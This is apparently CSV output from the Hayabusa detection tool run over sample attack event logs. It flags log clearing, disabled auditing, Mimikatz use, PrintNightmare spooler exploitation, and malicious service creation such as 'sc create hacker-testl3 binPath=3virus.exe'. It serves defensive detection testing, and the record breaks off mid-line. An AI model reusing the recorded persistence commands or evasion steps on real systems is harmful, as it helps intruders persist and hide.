+2021-10-25 18:11:11.184 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.200 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.216 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.247 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.341 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.388 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.403 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.450 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.559 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.575 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.622 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.700 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.747 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 
+2021-10-25 18:11:11.778 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.825 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.841 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.856 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.872 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.888 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.903 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.997 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:12.059 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:12.075 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:12.106 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:12.153 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:12.184 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 
+2021-10-25 18:11:12.247 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:21:02.504 +00:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Audit policy enumerated.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event 
Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 
+00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy 
disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 20:17:07.565 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc create hacker-testl3 binPath=""3virus.exe"" | Path: C:\Windows\System32\sc.exe | PID: 0x64c | User: admmig | LID: 0x123550",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service created 
(command).evtx +2021-10-25 20:17:07.565 +00:00,FS03.offsec.lan,4688,low,Persis | PrivEsc,New Service Creation,,rules/sigma/process_creation_builtin/proc_creation_win_new_service_creation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service created (command).evtx +2021-10-25 20:23:34.575 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"New-Service -Name ""hackervirus"" -BinaryPathName '""virus.exe""'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service creation (PowerShell).evtx +2021-10-25 20:23:34.715 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Service): ""New-Service"" ParameterBinding(New-Service): name=""Name""; value=""hackervirus"" ParameterBinding(New-Service): name=""BinaryPathName""; value=""""virus.exe""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service creation (PowerShell).evtx +2021-10-25 20:23:34.715 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"[System.Diagnostics.DebuggerHidden()] param() $foundSuggestion = $false if($lastError -and ($lastError.Exception -is ""System.Management.Automation.CommandNotFoundException"")) { $escapedCommand = [System.Management.Automation.WildcardPattern]::Escape($lastError.TargetObject) $foundSuggestion = @(Get-Command ($ExecutionContext.SessionState.Path.Combine(""."", $escapedCommand)) -ErrorAction Ignore).Count -gt 0 } 
$foundSuggestion",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service creation (PowerShell).evtx +2021-10-25 20:23:34.715 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""hackervirus""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service creation (PowerShell).evtx +2021-10-25 20:23:34.715 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"""The command $($lastError.TargetObject) was not found, but does exist in the current location. Windows PowerShell does not load commands from the current location by default. If you trust this command, instead type `"".\$($lastError.TargetObject)`"". 
See `""get-help about_Command_Precedence`"" for more details.""",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service creation (PowerShell).evtx +2021-10-25 20:23:34.736 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service creation (PowerShell).evtx +2021-10-27 10:09:16.280 +00:00,fs03vuln.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 10:12:47.151 +00:00,fs03vuln.offsec.lan,4674,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" +2021-10-27 10:12:47.229 +00:00,fs03vuln.offsec.lan,5142,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" +2021-10-27 10:12:47.323 +00:00,fs03vuln.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 10:14:21.369 +00:00,fs03vuln.offsec.lan,302,critical,LatMov | 
CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 10:14:21.369 +00:00,fs03vuln.offsec.lan,849,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 10:14:21.369 +00:00,fs03vuln.offsec.lan,301,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 10:14:27.403 +00:00,fs03vuln.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 10:14:27.403 +00:00,fs03vuln.offsec.lan,4674,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" +2021-10-27 10:14:27.466 +00:00,fs03vuln.offsec.lan,848,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 10:14:27.466 +00:00,fs03vuln.offsec.lan,5142,critical,LatMov | CredAccess,Mimikatz 
Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" +2021-10-27 10:14:27.559 +00:00,fs03vuln.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 10:14:27.559 +00:00,fs03vuln.offsec.lan,300,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 10:28:26.260 +00:00,FS03.offsec.lan,354,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx +2021-10-27 10:28:26.260 +00:00,FS03.offsec.lan,354,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx +2021-10-27 10:28:26.307 +00:00,FS03.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx +2021-10-27 10:34:49.837 +00:00,FS03.offsec.lan,6416,critical,LatMov | CredAccess,Mimikatz 
Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx" +2021-10-27 10:34:50.024 +00:00,FS03.offsec.lan,4674,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx" +2021-10-27 10:35:56.899 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf08 | User: FS03$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx" +2021-10-28 13:41:21.325 +00:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: ""cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\System32\spoolsv.exe | LID: 0x3e7 | PID: 3388 | 